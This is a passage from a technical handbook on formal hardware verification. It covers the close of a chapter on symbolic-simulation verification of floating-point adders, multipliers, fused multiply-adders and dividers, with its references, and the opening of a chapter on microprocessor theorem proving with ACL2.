after the mantissa shift based on the exponent difference. Third, the technique
of parametric substitutions makes it possible to factor in the condition fixing the
exponent difference and carry out the simulation exactly under the scenario with
the given exponent difference, fixing the mantissa alignment shift both in the
implementation and the specification. Note, in particular, that in the case split, the
input exponents are not fixed themselves, just the difference between them is fixed.
As a further nuance, the true subtraction case, where the two inputs have
opposing signs, may lead to a wide normalization shift prior to rounding in cases
where the exponents are equal or almost equal, and the mantissas cancel each other
out almost completely in the subtraction. As the width of the shift depends on the
mantissa values, it is symbolic and not fixed, which may cause symbolic expression
growth in the normalization and rounding stages. For certain designs, a second-
level case split iterating over the possible widths of the normalization shift and
considering each shift width separately may be needed to contain BDD growth.
Again, the technique of parametric substitutions is essential in enabling us to carry
out the simulation exactly under the scenario with the fixed normalization shift.
For a more detailed floating-point addition verification case study, see Aagaard
et al. (1999a).
Integer Multiplication
property mulppok[i];
@(posedge clk)
( $past(vldA,4) && ( $past(opA,4)==MUL ) && ...
) |->
( $past(ppC[i],2) == ( $past(datainB[1],3) << i ) * ( $past(datainB[2][i],3) ) )
endproperty
property mulwbok;
@(posedge clk)
( $past(vldA,4) && ( $past(opA,4)==MUL ) && ...
) |->
( wbW == $past(ppC[15],2) + ... + $past(ppC[0],2) )
endproperty
In the first stage of the verification, symbolic variables are associated with the
input signals in the stimulus, and the symbolic expressions for the partial products
are computed through simulation. All operations performed on the way from inputs
to partial products are simple and have concise BDD representations.
In the second stage, the partial product signals are weakened, and another set of
symbolic variables are associated with them in the stimulus. Due to the weakening,
the relation between partial products and the inputs is lost, and the partial products
effectively become free inputs in the simulation. The main operations computed
between partial products and the result are all additions. A variable ordering
interleaving the variables associated with the partial product signals according to
their alignment in the addition results in concise BDDs in most cases, allowing the
relation between partial products and the output to be verified by direct simulation.
Real hardware multipliers are more complex than the simple example here.
Typically, they use Booth or other encodings to reduce the number of partial
products and have optimized adder trees (Booth 1951). However, the verification
principles are the same: the identification of partial products in the design, and the
verification of the relations between the inputs and the partial products, and the
partial products and the result separately. The mathematical “ideal” partial product
that the decomposed reference model refers to does not necessarily exist in a single
signal in the design. Instead, it is a verifier’s abstraction of information extracted
from the simulation. For example, with Booth encodings, a partial product is often
coded as a ones’ complement vector plus a negate bit, and these two added together
form the mathematical notion of a partial product.
As in the second stage of the verification, the partial product signals are weak-
ened, and the relation between them and the inputs is lost; the verification is more
general than strictly needed, covering all partial product signal bit combinations and
not only those that are actually realizable in the design. This may lead to spurious
verification failures if the logic downstream from the partial products relies on some
1310 R. Kaivola and J. O’Leary
partial products in a more concise set of signals. For a more detailed floating-point
multiplier verification example, see Kaivola and Narasimhan (2001).
Fused multiply-addition (FMA) is an operation that performs a multiplication of
two floating-point inputs and the addition of a third input, conceptually infinitely
precisely, and then normalizes and rounds the result of the addition, all in one
operation. FMA differs from a multiplication and an addition done in sequence in
that there is no rounding and subsequent loss of precision between the multiplication
and the addition. Many contemporary arithmetic hardware designs have a fused
multiply-adder as their basic building block.
The verification of a fused multiply-adder can be done with a combination of
the techniques for multipliers and adders. For multiplication, partial products are
identified in the design. Another decomposition point after partial products but
before the addition of the third input may also be needed. The relations between
the inputs and the partial products and the optional second decomposition point
are verified as for a multiply operation. Then, from this point on, the output is
verified as the addition of the product, or sum of partial products, and the third input,
using the same exponent difference-based case split as for floating-point addition.
The symbolic complexity of the normalization stage in a fused multiply-adder is
higher than in a plain multiplier, as an FMA does not guarantee the same kinds
of bounds on the unrounded result that lead to only a few possible normalization
scenarios for the plain multiplication. Handling of denormal input or output values
also increases complexity. Both aspects may necessitate further case splitting to
contain the symbolic complexity of the individual simulations. For more detailed
fused multiply-adder verification examples, see Slobodova and Nagalla (2004),
Slobodova (2006), and KiranKumar et al. (2012). For a related approach with very
similar case splitting considerations, see Jacobi et al (2005).
While the authors are not aware of any precise theoretical bounds for binary
expression sizes for division along the lines of those for multiplication, experience
has shown that expression growth for division is at least as bad as for multiplication,
and direct verification by symbolic simulation is feasible for only relatively small
operand sizes.
Division differs from all the operations above in two important ways. First,
useful abstract reference models are by necessity relational instead of functional,
describing a variety of correct implementations instead of a single one. Second,
both the reference model algorithms and implementations are iterative, containing a
loop computing increasingly precise approximations of the mathematically precise
result, which in itself may not even be accurately representable in a finite form. An
iterative implementation may either consist of a loop unrolling or the same hardware
being used repeatedly over multiple cycles.
Consider the simple Sweeney-Robertson-Tocher (SRT) type iterative division
algorithm in Fig. 26, using the redundant quotient digit set {−1, 0, 1}. It takes two
1312 R. Kaivola and J. O’Leary
normal floating-point numbers as inputs and produces the rounded quotient of the
first input divided by the second. In the pseudo-code the floating-point exponents Ne
and De are viewed as integers, and the mantissas N and D as fractions. The number
of iterations imax depends on the required precision of the result. Conceptually,
enough quotient bits need to be computed to guarantee that the rest of the quotient
does not matter for the result after rounding. In practice, this is the target precision
mantissa size plus a few bits.
The algorithm does not specify the precise selection of the quotient digits qi . Any
selection will do, as long as the convergence bound
−D ≤ R[i] < D
from Q[i − 1] and R[i − 1] consistently using the same qi , and the convergence
bound −D ≤ R[i] < D is satisfied.
Conformance to the reference model is verified separately for each iteration.
For iteration i, the previous quotient and remainder Q[i − 1] and R[i − 1] are
considered free inputs, i.e., weakened and associated with fresh symbolic variables
in the stimulus, and the values of the next quotient and remainder Q[i] and R[i]
are computed by symbolic simulation. The relations between the previous and
next values and the convergence bound, expressed as property formulas, are then
verified in the simulation. A downside of the verification of each iteration in
isolation is that any implicit restrictions in the previous quotient and remainder
representations in the circuit are lost, as they are considered free inputs. When the
proper behavior of the circuit logic depends on such restrictions, they need to be
explicitly characterized as invariants. The identification and formulation of such
side invariants often requires detailed understanding of the implementation.
The symbolic expression complexity in the verification of a single iteration is
in most cases easily manageable, as good symbolic variable orderings exist for the
addition and subtraction operations in the loop update relation. The hardest aspect
is the computation of the next quotient digit qi and the update of the remainder R[i]
as a function of qi . As qi itself is a function of the previous remainder R[i − 1],
the next remainder R[i] depends on R[i − 1] in two ways, directly through the
update relation and indirectly through qi . This may set conflicting requirements
for symbolic variable positions in the ordering and lead to expression growth.
The symbolic expression complexity rises as a function of the width of qi , i.e.,
the number of bits computed per iteration. For very high radix dividers, careful
techniques may be needed to manage symbolic expression size, for example, case
splitting on the next quotient digit qi value to cut the double dependency of R[i] on
R[i − 1].
The validation of the reference model, i.e., the question “why do we trust that
the reference model computes division” belongs to the domain of theorem proving
and is discussed in more detail in Kaivola and Aagaard (2000) and O’Leary et al.
(2013). The essence of the argument is that the reference model guarantees the loop
invariant
Together with the convergence bound above, this implies that the quotients Q[i]
are increasingly accurate approximations of N/D. For a more detailed example of
divider verification, see Kaivola and Aagaard (2000).
Floating-point square root can be computed by algorithms very similar to those
for division, and the verification approach outlined above extends to square root as
well. The update relation is more intricate and any issues in symbolic expression
growth tend to be worse for square root than for division. On the other hand, the fact
that square root is a unary operation allows direct verification for wider operand
sizes.
1314 R. Kaivola and J. O’Leary
Industrial Verification
The previous sections enumerated some of the most common types of arithmetic
circuits and verification strategies for them. In practice, such datapaths seldom occur
in isolation. They are bundled together in an integrated design unit that implements
a family of arithmetic operations, often multiplexing different datapaths together to
maximize circuit reuse. The verification engineer then typically faces the task of
validating all the operations supported by the design. The largest examples of such
verification tasks that the authors have been involved in have encompassed the full
Execution Cluster EXE in Intel CoreTM and Intel Atom processor designs, as well
as the graphics floating-point units in Intel Gen graphics designs.
The management of such large-scale verification tasks poses several methodolog-
ical challenges. As a verification method, symbolic simulation requires closer user
guidance than traditional model checking: decisions on signals and times with which
to associate symbolic variables in the stimulus, instantiations of external control
assumptions, judicious weakening to contain simulation scope, variable orderings to
manage symbolic expression complexity, and so on. In a live development project,
this verification collateral needs to be maintained throughout the project timeline
and modified to account for design changes. All verification goals also need to be
frequently revalidated.
To make large-scale verification tasks possible, the verification environment
needs to be highly programmable. In the symbolic simulation verification environ-
ment used for most Intel development projects, this is achieved by embedding the
core symbolic simulator in a code layer called relational STE (rSTE) in the context
of a full-fledged functional programming language. The common computational
complexity reduction techniques discussed above, including weakening, parametric
substitution, etc., are made easily accessible to the user through programmable
options to the tool. The framework also provides sophisticated debug support,
breakpoints, waveform and circuit visualization, etc., to enable the user to quickly
focus on usual verification problems. For the verification of the implication between
the input and output constraints, the tool uses the methods discussed in Kaivola
(2005).
A productive verification environment for large-scale tasks also needs to be
able to take advantage of commonality between individual verification goals. This
commonality occurs in two dimensions: first, between different operations on the
same design, and second, between the same operation on different designs. The first
kind is reflected, for example, in the signals and timing of an operation, or control
assumption instantiations. The second manifests itself in the overall verification
strategies for different types of operations, as outlined in the previous sections.
The existence of reusable tried-and-tested verification strategies or “recipes”
for solving particular classes of problems is a key requirement for reliable and
timely verification work. Such recipes allow the verification engineers either to
identify a computational strategy or to flag a verification task as being of unknown
complexity. In practice, the recipes are represented as code artifacts, not just as
36 Verification of Arithmetic and Datapath Circuits with Symbolic Simulation 1315
abstract guidelines. This code collateral needs to be sufficiently abstract and design-
independent that it can be used and maintained across different projects over a long
period of time. In the authors’ experience, such code collateral often pays its cost
back the first time it is reused.
In Intel’s verification environment, the reusable collateral for arithmetic verifi-
cation is captured in a single large software artifact called Common Verification
Environment (CVE). It is a result of substantial software and proof engineering
(Kaivola and Kohatsu 2003) to create a standard, uniform methodology for writing
specifications and carrying out verification tasks. The aim of the effort is to
support reuse and code maintenance over a continuously changing design and
separate common and project-specific parts to allow shared code to be written
only once. Programming language paradigms such as algebraic and other structured
datatypes are used to enforce abstraction and shared structure. Code collateral and
related methodology also covers control invariant, state and bypass verification,
and interfaces with mainstream simulation environment for external assumption
checking. For a more detailed exposition, see Kaivola et al. (2009).
Related Work
Carl Seger joined Intel in 1995, bringing the Voss system with him. Voss formed
the basis of a major new system called Forte. Almost immediately Forte saw applica-
tion to floating-point arithmetic in the Intel Pentium Pro processor design project
in the aftermath of the Pentium processor FDIV bug of 1994 (Pratt 1995). Most
of the fundamental techniques described in the current chapter were developed in
this timeframe at Intel’s Strategic CAD Labs (SCL): parametric substitutions (Jones
2002; Aagaard et al. 1999a), many case studies and methodology development
(Jones et al. 2001; O’Leary et al. 1999), manipulating programs as objects through
Lifted FL (Aagaard et al. 1999b) and reasoning about them in the theorem prover
ThmTac (Aagaard et al. 1999c). The wave of development as a whole is summarized
in the overview paper (Seger et al. 2005).
In the next phase, much of the symbolic simulation-based formal verification
work at Intel moved from research groups to dedicated formal verification teams in
the product development organizations. This began with the Pentium 4 processor
development project in 1999. This work included technical advances in verification
of complex circuits such as multipliers (Kaivola and Narasimhan 2001), fused
multiply-adders (Slobodova and Nagalla 2004), and iterative algorithms including
dividers (Kaivola and Aagaard 2000; Aagaard et al. 2000). Advances were made
in verification engineering and the management of large-scale verification tasks in
an active project development setting (Kaivola and Kohatsu 2003). The extension
of STE to a relational formalism like the one used in this chapter was first outlined
in Kaivola (2005), and the overall verification methodology was presented in the
capstone paper (Kaivola et al. 2009). Alongside the wide-scale deployment, the
verification infrastructure was improved by the adoption of the reFLect functional
programming language (Grundy et al. 2006), an evolution of the fl language used
by the original Forte. The precise semantics of the relational extension of STE was
first formulated in the context of the theorem prover Goaled (O’Leary et al. 2013),
tightly connecting symbolic simulation to high-level reasoning.
Outside the area of arithmetic verification, symbolic simulation has been used
for verification of embedded memory arrays (Pandey et al. 1996; Krishnamurthy
et al. 2000), control logic (Kaivola and Naik 2005; Kaivola 2005), and automatic
symbolic indexing abstractions (Adams et al. 2007). Techniques for automatic
refinement of the X-abstraction used in STE are discussed in Tzoref and Grumberg
(2006) and Roorda and Claessen (2006). More recently, symbolic simulation has
been applied to security verification (Bar Kama and Kaivola 2021) and verification
of Error Correction Code (ECC) algorithms and implementations (Gupta et al.
2022).
Extensions of symbolic simulation include word-level methods (Chakraborty
et al. 2017). Also, a formalism and tool called generalized STE (GSTE) (Yang
and Seger 2003) extends symbolic simulation with mechanisms to handle feedback
loops.
The Handbook of Model Checking contains a precise, but very readable, intro-
duction to the theory underlying symbolic trajectory evaluation (Melham 2018).
General treatments of symbolic simulation in practice can be found in the mono-
graphs by Jones (2002) and Bertacco (2006).
36 Verification of Arithmetic and Datapath Circuits with Symbolic Simulation 1317
A symbolic simulator has been developed and integrated within the ACL2
theorem prover (Swords 2010, 2017; Swords and Davis 2011; Slobodova et al.
2011). The tool supports bit-level and word-level symbolic simulation of both
software and hardware with BDD and AIG representations and implements many
of the paradigms discussed in this chapter. It has been extensively used in industrial
verification (Goel et al. 2021). The simulator is available in open source as part of
ACL2.
The Intel tool Forte described in this chapter is proprietary; however, an evolution
of both Voss and Forte called VossII now exists in open source (VossII 2020).
Acknowledgments This chapter summarizes almost three decades of work. At the time of its
writing, more than 60 people have directly contributed to Intel’s shared arithmetic verification
code-base on over 50 design projects. A much higher number have contributed intellectually to the
endeavor, both inside Intel and at large. It has been a team effort. We would like to express our
sincere thanks to each and every member of the team.
We would also like to thank Intel’s design and validation management over the years for trusting
and encouraging this work. There are more names than we can mention; however, we would like
to express our special thanks to Bob Bentley and Alon Flaisher for their crucial long-term support.
Finally, we would like to thank Jesse Bingham, Levent Erkok, Robert Jones, Joe Leslie-Hurd,
Sayak Ray, and Annette Upton for their detailed feedback on the drafts of this text.
References
Aagaard M, Seger C-J (1995) The formal verification of a pipelined double-precision IEEE
floating-point multiplier. In: Proceedings of IEEE international conference on computer aided
design (ICCAD), pp 7–10
Aagaard MD, Jones RB, Seger C-JH (1999a) Formal verification using parametric representations
of Boolean constraints. In: Proceedings of the 36th annual ACM/IEEE design automation
conference, pp 402–407
Aagaard MD, Jones RB, Seger C-JH (1999b) Lifted-FL: a pragmatic implementation of combined
model checking and theorem proving. In: Theorem proving in higher order logics. Springer,
pp 323–340
Aagaard MD, Melham TF, O’Leary JW (1999c) Xs are for trajectory evaluation, Booleans are for
theorem proving. In: Pierre L, Kropf T (eds) Correct hardware design and verification methods.
Springer, pp 202–218
Aagaard MD, Jones RB, Kaivola R, Kohatsu KR, Seger C-JH (2000) Formal verification of
iterative algorithms in microprocessors. In: Proceedings of the 37th annual design automation
conference, pp 201–206
Adams S, Bjork M, Melham T, Seger C-J (2007) Automatic abstraction in symbolic trajectory
evaluation. In: Formal methods in computer aided design (FMCAD’07), pp 127–135
Akers SB (1978) Binary decision diagrams. IEEE Trans Comput C-27:509–516
Bar Kama N, Kaivola R (2021) Hardware security leak detection by symbolic simulation. In: 2021
formal methods in computer aided design (FMCAD), pp 34–41
Beatty DL, Bryant RE, Seger C-JH (1990) Synchronous circuit verification by symbolic simula-
tion: an illustration. In: Proceedings of the sixth MIT conference on advanced research in VLSI,
pp 98–112
Bertacco V (2006) Scalable hardware verification with symbolic simulation. Springer
Bingham JD (2015) Universal Boolean functional vectors. In: Formal methods in computer-aided
design (FMCAD), pp 25–32
1318 R. Kaivola and J. O’Leary
Bingham J, Leslie-Hurd J (2014) Verifying relative error bounds using symbolic simulation. In:
Biere A, Bloem R (eds) Proceedings of the 26th international conference on computer aided
verification (CAV 2014). Lecture notes in computer science, vol 8559. Springer, pp 277–292
Bjesse P, Boralv A (2004) DAG-aware circuit compression for formal verification. In: IEEE/ACM
international conference on computer aided design, 2004. ICCAD-2004, pp 42–49
Booth AD (1951) A signed binary multiplication technique. Q J Mech Appl Math 4:236–240
Bryant RE (1985) Symbolic verification of MOS circuits. In: 1985 Chapel Hill conference on
VLSI, pp 419–438
Bryant RE (1986) Graph-based algorithms for Boolean function manipulation. IEEE Trans Comput
C-35:677–691
Bryant RE (1990) Verification of synchronous circuits by symbolic logic simulation. In: Hardware
specification, verification and synthesis: mathematical aspects. Lecture notes in computer
science, vol 408. Springer, pp 14–24
Bryant RE, Seger C-JH (1990) Formal verification of digital circuits using symbolic ternary system
models. In: International conference on computer aided verification, pp 33–43
Chakraborty S, Khasidashvili Z, Seger C-JH, Gajavelly R, Haldankar T, Chhatani D, Mistry R
(2017) Symbolic trajectory evaluation for word-level verification: theory and implementation.
Formal Methods Syst Des 50(2–3):317–352
Darringer J (1979) The application of program verification techniques to hardware verification. In:
16th design automation conference, pp 375–381
Darringer J, King JC (1978) Applications of symbolic execution to program testing. IEEE Des Test
Comput 51–60
Drane T, Kiran Kumar MA (2022) C-to-RTL equivalence checking. In: Chattopadhyay A (ed)
Handbook of computer architecture. Springer
Goel S, Slobodova A, Sumners R, Swords S (2021) Balancing automation and control for formal
verification of microprocessors. In: Silva A, Leino KRM (eds) Computer aided verification.
Springer, pp 26–45
Grundy J, Melham T, O’Leary J (2006) A reflective functional language for hardware design and
theorem proving. J Funct Program 16(2):157–196
Gupta A, Kaivola R, Mehta M, Singh V (2022) Error correction code algorithm and implementa-
tion verification using symbolic representations. In: Griggio A, Rungta N (eds) Formal methods
in computer aided design (FMCAD), pp 151–159
Harrison J (2009) Handbook of practical logic and automated reasoning. Cambridge University
Press
Hazelhurst S, Seger C-JH (1997) Symbolic trajectory evaluation. In: Kropf T (ed) Formal hardware
verification: methods and systems in comparison. Springer, pp 3–78
IEEE standard for binary floating-point arithmetic (1985) Institute of Electrical and Electronics
Engineers. Note: Standard 754–1985
IEEE standard for SystemVerilog–unified hardware design, specification, and verification language
(2018) IEEE Std 1800-2017 (Revision of IEEE Std 1800-2012), pp 1–1315
Jacobi C, Weber K, Paruthi V, Baumgartner J (2005) Automatic formal verification of fused-
multiply-add FPUs. In: Proceedings of the conference on design, automation and test in Europe
– Volume 2, DATE’05. IEEE Computer Society, pp 1298–1303
Jones RB (2002) Symbolic simulation methods for industrial formal verification. Springer
Jones RB, O’Leary JW, Seger C-JH, Aagaard MD, Melham TF (2001) Practical formal verification
in microprocessor design. IEEE Des Test Comput 18(4):16–25
Kaivola R (2005) Formal verification of Pentium 4 components with symbolic simulation and
inductive invariants. In: Etessami K, Rajamani SK (eds) Computer aided verification. Springer,
pp 170–184
Kaivola R, Aagaard M (2000) Divider circuit verification with model checking and theorem
proving. In: Theorem proving in higher order logics. TPHOLs 2000. Lecture notes in computer
science, vol 1869. Springer, pp 338–355
Kaivola R, Kohatsu KR (2003) Proof engineering in the large: formal verification of Pentium 4
floating-point divider. Int J Softw Tools Technol Transf 4(3):323–334
36 Verification of Arithmetic and Datapath Circuits with Symbolic Simulation 1319
Kaivola R, Naik A (2005) Formal verification of high-level conformance with symbolic sim-
ulation. In: Tenth IEEE international high-level design validation and test workshop, 2005,
pp 153–159
Kaivola R, Narasimhan N (2001) Formal verification of the Pentium 4 multiplier. In: Proceedings
sixth IEEE international high-level design validation and test workshop, Los Alamitos. IEEE
Computer Society, pp 115–120
Kaivola R, Ghughal R, Narasimhan N, Telfer A, Whittemore J, Pandav S, Slobodová A, Taylor
C, Frolov V, Reeber E, Naik A (2009) Replacing testing with formal verification in Intel
Core i7 processor execution engine validation. In: Bouajjani A, Maler O (eds) Computer aided
verification. Springer, pp 414–429
Kaivola R, Bar Kama N (2022) Timed causal fanin analysis for symbolic circuit simulation. In:
Griggio A, Rungta N (eds) Formal methods in computer aided design (FMCAD), pp 99–107
King JC (1979) Symbolic execution and program testing. Commun ACM 19(7):385–394
KiranKumar VMA, Gupta A, Ghughal R (2012) Symbolic trajectory evaluation: the primary
validation vehicle for next generation Intel processor graphics FPU. In: 2012 formal methods in
computer-aided design (FMCAD), pp 149–156
Krishnamurthy N, Martin AK, Abadir MS, Abraham JA (2000) Validating PowerPC microproces-
sor custom memories. IEEE Des Test Comput 17(4):61–76
Kuehlmann A, Paruthi V, Krohm F, Ganai M (2002) Robust Boolean reasoning for equivalence
checking and functional property verification. IEEE Trans Comput-Aided Des Integr Circuits
Syst 21(12):1377–1394
Melham T (2018) Symbolic trajectory evaluation. In: Clarke EM, Henzinger TA, Veith H, Bloem
R (eds) Handbook of model checking, ch. 25. Springer, pp 831–870
O’Leary J, Zhao X, Gerth RT, Seger C-JH (1999) Formally verifying IEEE compliance of floating-
point hardware. Intel Tech J, pp 1–14
O’Leary J, Kaivola R, Melham T (2013) Relational STE and theorem proving for formal
verification of industrial circuit designs. In: 2013 formal methods in computer-aided design,
pp 97–104
Pandey M, Raimi R, Beatty DL, Bryant RE (1996) Formal verification of PowerPC arrays using
symbolic trajectory evaluation. In: DAC’96: proceedings of the 33rd annual design automation
conference. Association for Computing Machinery, pp 649–654
Pratt V (1995) Anatomy of the Pentium bug. In: Mosses PD, Nielsen M, Schwartzbach MI (eds)
TAPSOFT’95: theory and practice of software development. Springer, pp 97–107
Ray S, Goel S (2022) Theorem proving. In: Chattopadhyay A (ed) Handbook of computer
architecture. Springer
Roorda J-W, Claessen K (2006) SAT-based assistance in abstraction refinement for symbolic
trajectory evaluation. In: Ball T, Jones RB (eds) Computer aided verification. Springer,
pp 175–189
Russinoff DM (1998) A mechanically checked proof of IEEE compliance of the floating point
multiplication, division and square root algorithms of the AMD-K7 processor. LMS J Comput
Math 1:148–200
Russinoff D (2019) Formal verification of floating-point hardware design. Springer
Seger C-JH (1993) Voss – a formal hardware verification system user’s guide. https://doi.org/10.
5555/901942
Seger C-JH, Bryant RE (1995) Formal verification by symbolic evaluation of partially-ordered
trajectories. Formal Methods Syst Des 6:147–190
Seger C-J, Jones R, O’Leary J, Melham T, Aagaard M, Barrett C, Syme D (2005) An industrially
effective environment for formal hardware verification. IEEE Trans Comput-Aided Des Integr
Circuits Syst 24(9):1381–1405
Seligman E, Schubert T, Kiran Kumar MVA (2015) Formal verification: an essential toolkit for
modern VLSI design. Morgan Kaufmann Publishers Inc.
Slobodova A (2006) Challenges for formal verification in industrial setting. In:
FMICS’06/PDMC’06: Proceedings of the 11th international workshop, FMICS 2006
1320 R. Kaivola and J. O’Leary
and 5th international workshop, PDMC conference on formal methods: applications and
technology. Springer, pp 1–22
Slobodova A, Nagalla K (2004) Formal verification of floating point multiply add on Itanium
processor. In: Fifth international workshop on designing correct circuits, ETAPS 2004
Slobodova A, Davis J, Swords S, Hunt W (2011) A flexible formal verification environment for
industrial scale verification. In: Ninth ACM/IEEE international conference on formal methods
and models for codesign (MEMOCODE2011), pp 89–97
Swords SO (2010) A verified framework for symbolic execution in the ACL2 theorem prover. PhD
thesis, University of Texas at Austin. http://hdl.handle.net/2152/ETD-UT-2010-12-2210
Swords S (2017) Term-level reasoning in support of bit-blasting. In: Slobodova A, Hunt WA Jr
(eds) Proceedings 14th international workshop on the ACL2 theorem prover and its applications,
Austin, 22–23 May 2017. Electronic proceedings in theoretical computer science, vol 249. Open
Publishing Association, pp 95–111
Swords S, Davis J (2011) Bit-blasting ACL2 theorems. In: Hardin D, Schmaltz J (eds) Proceedings
10th international workshop on the ACL2 theorem prover and its applications, Austin, 3–4
Nov 2011. Electronic proceedings in theoretical computer science, vol 70. Open Publishing
Association, pp 84–102
Tzoref R, Grumberg O (2006) Automatic refinement and vacuity detection for symbolic trajectory
evaluation. In: Ball T, Jones RB (eds) Computer aided verification. Springer, pp 190–204
Vizel Y, Ivrii A (2022) Bit level model checking algorithms. In: Chattopadhyay A (ed) Handbook
of computer architecture. Springer
VossII (2020). https://github.com/TeamVoss/VossII. Accessed: 8 June 2021
Yang J, Seger C-J (2003) Introduction to generalized symbolic trajectory evaluation. IEEE Trans
Very Large Scale Integr (VLSI) Syst 11(3):345–353
Microprocessor Assurance and the Role
of Theorem Proving 37
Shilpi Goel and Sandip Ray
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1322
ACL2 Preliminaries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1324
Logic Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1325
Extension Principles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1327
The Theorem Prover . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1328
Some Execution Features: Guards, MBE, and Stobjs . . . . . . . . . . . . . . . . . . . . . . . . . . . 1329
ISA Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1332
ISA Formalization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1333
Mechanical Analysis for ISA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1334
Binary Code Analysis with ISA Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1335
Some Formalized ISAs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1336
Analysis of Microarchitecture Properties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1338
Pipelining, Out-of-Order, and Speculative Executions . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1338
Reasoning About Memory Hierarchy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1342
Verification of Execution Units . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1343
Deep Dive: Formalization and Analysis of (Simplified) x86 . . . . . . . . . . . . . . . . . . . . . . . . . 1345
Approach . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1345
Application: Verifying x86 Instruction Implementations . . . . . . . . . . . . . . . . . . . . . . . . . . 1350
The work presented in this chapter was done when this author was at Centaur Technology, Inc.,
and prior to that, The University of Texas at Austin..
S. Goel
Intel Corporation, Austin, TX, USA
e-mail: [email protected]
S. Ray ()
Department of ECE, University of Florida, Gainesville, FL, USA
e-mail: [email protected]
Abstract
Keywords
Introduction
a trusted computer program which is responsible for guiding the proof process
and checking the validity of the constructed proof. When successful, the approach
provides a high assurance in the reliability of the system, viz., a mathematical
guarantee of its correctness up to the accuracy of the model and the soundness of the
computer program employed in the reasoning process. The approach is particularly
enticing since, unlike simulation and testing, the guarantee is provided for all system
executions.
This chapter focuses on microprocessor verification research through a
quintessential formal verification technique: mechanical theorem proving. In this
approach, the focus is to formalize and prove – with the assistance of a computer
program referred to as the theorem prover – properties of computing systems just
like one would prove any other mathematical formula, using standard mathematical
techniques like induction, term rewriting, generalization, etc. Theorem provers are
general-purpose tools which have been used to prove mathematical results as well
(Shankar 1997; Russinoff 1992; Paulson 1993, 1995). Typically, no specialized
mathematical foundation is provided specifically for microprocessor proofs per
se, although certain proof techniques might be better suited for verifying certain
properties. One consequence of the generality is that theorem proving is not
automatic in general, and its successful use for proving nontrivial theorems about
complicated systems depends on significant interaction with a trained user. The
user must be familiar with the formal logic of the theorem prover as well as the
nuances of the system being verified. Interacting with a theorem prover “feels” like
constructing a very careful mathematical argument for its correctness, with the
prover checking the correctness of the low-level details of the argument. Contrast
this with other so-called “automated” formal verification approaches like model
checking, equivalence checking, or assertion-based verification, where the logic
and formalism used is specifically tailored for capturing properties of computing
systems; verification reduces to an algorithm to check if the system (modeled using
that formalism) satisfies the property.
Obviously, all other things remaining equal, employing an automated verification
tool is preferable to a framework that requires close user involvement of a trained
user. Why then would one want to use theorem proving rather than the more
automated approaches? The key reason is that other things are not equal. In
particular, automated algorithms incur high computational complexity. In practice,
they can only be fully automatic for very small systems; for larger systems, these
approaches are limited by the available time or memory. Furthermore, most theorem
provers afford a substantial degree of control in the process of derivation of complex
theorems. This can be exploited by the user in different forms, typically by proving
key intermediate lemmas that assist the theorem prover in its proof search. By
manually structuring and decomposing the verification problem, the user can guide
the theorem prover into proofs about very complex systems.
There are several theorem provers available today, including ACL2 (Kaufmann
et al. 2000b), Coq (Dowek et al. 1991), Forte (Aagard et al. 2000), HOL (Gordon
and Melham 1993), Isabelle (Nipkow et al. 2002), and PVS (Owre et al. 1992).
The underlying logics of theorem provers vary considerably, spanning across set
1324 S. Goel and S. Ray
theory, constructive type theory, first-order logic, higher-order logic, etc. There is
also substantial difference in the amount of automation provided by the different
theorem provers; some are proof checkers, while others can do a considerable
amount of unassisted reasoning. Different theorem provers have been employed for
reasoning about a variety of architectural, microarchitectural, and hardware features
of microprocessors. It is impossible to provide a thorough account of all this work
in a single chapter. Rather this chapter reviews some key highlights of this extensive
research. We will discuss how different features are formalized, provide a flavor of
the modeling and reasoning involved, and recount some of the success stories in
application of theorem proving in this area on a large scale. We will use the ACL2
theorem prover (Kaufmann et al. 2000a,b) for illustrating many of the reasoning and
concepts involved. ACL2 has been used extensively for verification of a variety of
microarchitectures, ranging from different (simplified) variants of x86 and JVM
bytecode. However, we use ACL2 only for demonstration purposes. No prior
knowledge of the theorem prover is assumed, and many of the approaches discussed
are applicable to other theorem provers as well. A basic overview of ACL2 features
relevant to the discussion will be provided in Section “ACL2 Preliminaries”.
The remainder of the chapter is organized as follows. Section “ACL2 Pre-
liminaries” presents the relevant background on theorem proving, including the
overview of ACL2 mentioned above. Section “ISA Analysis” presents approaches
to formalize the Instruction Set Architectures (ISAs) and recounts application of
theorem proving at this architectural level. Section “Analysis of Microarchitecture
Properties” provides a similar overview of verification of microarchitecture features,
including pipelining, cache coherence, and execution units. In Section “Deep Dive:
Formalization and Analysis of (Simplified) x86”, we dive deeper into one specific
formalization work, viz., the use of ACL2 in reasoning about x86. Section “Theorem
Proving Beyond Microarchitecture” goes a bit beyond architecture in two ways: the
use of theorem proving to verify hardware implementation of specific microarchi-
tecture components on the one side and software binaries on the other. We conclude
in Section “Conclusion”.
ACL2 Preliminaries
a machine execution via functions such as step and run), we should understand
what it means for doing so in a theorem prover and how it is reconciled with the
logic. Second, theorems that correspond to properties of large computing systems
